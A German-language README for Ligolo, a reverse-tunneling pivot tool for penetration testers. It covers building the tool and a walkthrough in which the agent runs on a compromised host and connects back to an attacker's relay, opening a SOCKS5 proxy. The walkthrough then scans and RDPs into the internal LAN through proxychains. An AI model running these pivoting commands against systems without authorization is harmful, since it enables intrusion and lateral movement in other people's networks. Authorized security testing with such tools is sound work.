
Reverse Tunneling einfach gemacht für Pentester, von Pentestern https://sysdream.com/

Ligolo ist ein einfaches und Werkzeug zum Aufbau von - oder -Tunneln aus einer Reverse-Verbindung in vollständiger Sicherheit (TLS-Zertifikat mit elliptischer Kurve).
Es ist vergleichbar mit Meterpreter mit Autoroute + Socks4a, aber stabiler und schneller.
Sie haben während Ihres externen Audits einen Windows / Linux / Mac Server kompromittiert. Dieser Server befindet sich in einem LAN-Netzwerk und Sie möchten Verbindungen zu anderen Maschinen in diesem Netzwerk herstellen.
Ligolo kann einen Tunnel einrichten, um auf die Ressourcen des internen Servers zuzugreifen.
Relay einer RDP-Verbindung mit Proxychains (WAN).

Hier ist ein Screenshot eines Geschwindigkeitstests zwischen zwei 100-Mbit/s-Hosts (ligolo / localrelay). Die Leistung kann je nach System- und Netzwerkkonfiguration variieren.

Stellen Sie sicher, dass Go installiert und funktionsfähig ist.
cd `go env GOPATH`/src
git clone https://github.com/sysdream/ligolo
cd ligolo
make dep
make certs TLS_HOST=example.com
HINWEIS: Sie können auch Ihre eigenen Zertifikate verwenden, indem Sie die TLS_CERT-Make-Option beim Aufruf von build verwenden. Beispiel: make build-all TLS_CERT=certs/mycert.pem.
make build-all
make build
Ligolo besteht aus zwei Modulen:
Localrelay ist dazu gedacht, auf dem Steuerserver (dem Angreiferserver) gestartet zu werden.
Ligolo ist das Programm, das auf dem Zielcomputer ausgeführt wird.
Für localrelay können Sie die Standardoptionen belassen. Es hört auf allen Schnittstellen auf Port 5555 und wartet auf Verbindungen von ligolo (-relayserver-Parameter).
Für ligolo müssen Sie die IP-Adresse des Relay-Servers (oder Ihres Angriffsservers) mit dem Parameter -relayserver ip:port angeben.
Sie können die Option -h für Hilfe verwenden.
Sobald die Verbindung zwischen Ligolo und LocalRelay hergestellt ist, wird ein SOCKS5-Proxy auf TCP-Port 1080 auf dem Relay-Server eingerichtet (Sie können die TCP-Adresse/den Port mit der Option -localserver ändern).
Danach müssen Sie nur noch Ihr bevorzugtes Werkzeug (z.B. Proxychains) verwenden und das LAN-Netzwerk des Clients erkunden.
Auf Ihrem Angriffsserver.
./bin/localrelay_linux_amd64
Auf dem kompromittierten Host.
> ligolo_windows_amd64.exe -relayserver LOCALRELAYSERVER:5555
Sobald die Verbindung hergestellt ist, setzen Sie die folgenden Parameter in der ProxyChains-Konfigurationsdatei (auf dem Angriffsserver):
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks5 127.0.0.1 1080
Profitieren.
$ proxychains nmap -sT 10.0.0.0/24 -p 80 -Pn -A
$ proxychains rdesktop 10.0.0.123
Localrelay-Optionen:
Usage of localrelay:
-certfile string
The TLS server certificate (default "certs/server.crt")
-keyfile string
The TLS server key (default "certs/server.key")
-localserver string
The local server address (your proxychains parameter) (default "127.0.0.1:1080")
-relayserver string
The relay server listening address (the connect-back address) (default "0.0.0.0:5555")
Ligolo-Optionen:
Usage of ligolo:
-autorestart
Attempt to reconnect in case of an exception
-relayserver string
The relay server (the connect-back address) (default "127.0.0.1:5555")
-skipverify
Skip TLS certificate pinning verification
-targetserver string
The destination server (a RDP client, SSH server, etc.) - when not specified, Ligolo starts a socks5 proxy server
GNU General Public License v3.0 (Siehe LICENSING).